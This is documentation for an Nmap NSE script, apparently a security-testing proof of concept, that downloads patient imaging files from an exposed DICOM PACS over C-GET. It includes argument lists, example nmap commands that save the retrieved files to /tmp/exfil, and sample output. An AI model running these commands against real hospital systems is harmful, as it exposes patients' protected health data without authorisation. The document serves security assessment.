Script dicom-get

Script types: portrule
Categories: discovery, intrusive
Download: https://svn.nmap.org/nmap/scripts/dicom-get.nse

Script Summary

DICOM C-GET image retrieval and data exfiltration proof-of-concept.

Downloads DICOM instances (images, reports, structured reports) from a PACS via C-GET, saving them to disk as .dcm files. This demonstrates the real-world impact of an exposed DICOM Q/R service: not just that patient data is visible (as shown by dicom-cfind-ls), but that it can be fully exfiltrated.

The workflow mirrors what a legitimate DICOM SCU does: 1. C-FIND at STUDY level to discover studies (or use a known StudyInstanceUID) 2. C-GET at STUDY/SERIES/IMAGE level to retrieve instances 3. For each instance, the SCP sends a C-STORE sub-operation on the same association; this script acts as a mini-SCP, receiving and saving each file

C-GET is preferred over C-MOVE because it works on the same association -- no need for the target to connect back to us, and no need for our AE to be registered in the PACS modality list.

Downloaded files retain the original DICOM dataset bytes and are valid .dcm files (with a Part 10 header prepended) that can be opened in any DICOM viewer (Horos, RadiAnt, MicroDicom, etc.).

WARNING: This is an intrusive script. It downloads actual patient data (PHI/PII) from the target PACS. Only use against systems for which you have explicit written authorisation. Downloaded files must be handled according to applicable data protection regulations (HIPAA, GDPR, etc.).

Requires the dicom.lua library (place in nselib/ or same directory).

Script Arguments

dicom-get.calling_ae

Our AE Title (default: "NMAP-GET")

dicom-get.called_ae

Target AE Title (default: "ANY-SCP")

dicom-get.patient_name

Patient name filter for C-FIND discovery (default: "*")

dicom-get.part10

Prepend DICOM Part 10 header to saved files (default: true)

dicom-get.save

Directory to save retrieved .dcm files (REQUIRED)

dicom-get.study_uid

Specific StudyInstanceUID to retrieve (default: discover via C-FIND)

dicom-get.info_model

Q/R information model: "study" or "patient" (default: "study")

dicom-get.series_uid

Specific SeriesInstanceUID to retrieve (requires study_uid)

dicom-get.patient_id

Patient ID filter for C-FIND discovery (default: "")

dicom-get.max_pdu

Max PDU Length (default: 16384)

dicom-get.timeout

DIMSE timeout in seconds (default: 30)

dicom-get.max_instances

Max instances per study (default: 50)

dicom-get.max_studies

Max studies to retrieve (default: 5)

dicom-get.level

Retrieval level: "STUDY", "SERIES", "IMAGE" (default: "STUDY")

dicom-get.modality

Modality filter for C-FIND discovery (default: "")

dicom.called_aet, dicom.calling_aet

See the documentation for the dicom library.

Example Usage

  • nmap -p 4242 --script dicom-get \
      --script-args 'dicom-get.called_ae=ORTHANC,dicom-get.calling_ae=LAUNCHER,dicom-get.save=/tmp/exfil' <target>
    
  • # Retrieve a specific study by UID
    nmap -p 4242 --script dicom-get \
      --script-args 'dicom-get.called_ae=ORTHANC,dicom-get.study_uid=1.2.3.4.5,dicom-get.save=/tmp/exfil' <target>
    
  • # Retrieve only 3 studies, up to 5 instances each
    nmap -p 4242 --script dicom-get \
      --script-args 'dicom-get.called_ae=ORTHANC,dicom-get.max_studies=3,dicom-get.max_instances=5,dicom-get.save=/tmp/exfil' <target>
    

Script Output

PORT     STATE SERVICE
4242/tcp open  dicom
| dicom-get:
|   Target AE: ORTHANC  Calling AE: LAUNCHER
|   Studies discovered: 2 (via C-FIND)
|   Retrieved:
|     Study 1.2.826...514 - Doe^John (PT_STRATIGOS_EC2_001)
|       Saved: 101 instances (12.4 MB)
|     Study 1.2.826...514 - Doe, John (1)
|       Saved: 101 instances (12.4 MB)
|   Total: 202 instances, 24.8 MB saved to /tmp/exfil
|   WARNING: Patient data downloaded without authentication
|_

Requires


Author:

  • Paulino Calderon <paulino@calderonpale.com>

License: Same as Nmap -- See https://nmap.org/book/man-legal.html

action

action (host, port)

MAIN ACTION

Parameters

host
 
port